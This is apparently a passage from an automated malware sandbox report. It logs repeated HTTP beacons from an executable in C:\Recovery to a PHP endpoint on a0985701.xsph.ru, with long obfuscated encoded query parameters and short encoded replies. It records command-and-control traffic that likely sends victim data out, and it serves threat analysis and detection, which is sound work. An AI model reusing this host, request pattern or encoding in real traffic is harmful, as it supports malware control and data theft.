/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:38.248681068 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:43.267050028 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:07:44.102874041 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:49.115508080 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:07:49.818958044 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:54.835216045 CEST	2132	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0Z [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:07:55.513802052 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:00.543112993 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:08:01.238668919 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:06.257934093 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:08:06.942858934 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:12.115185022 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:08:12.793523073 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:17.818942070 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:08:18.619081974 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:08:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:08:23.692904949 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
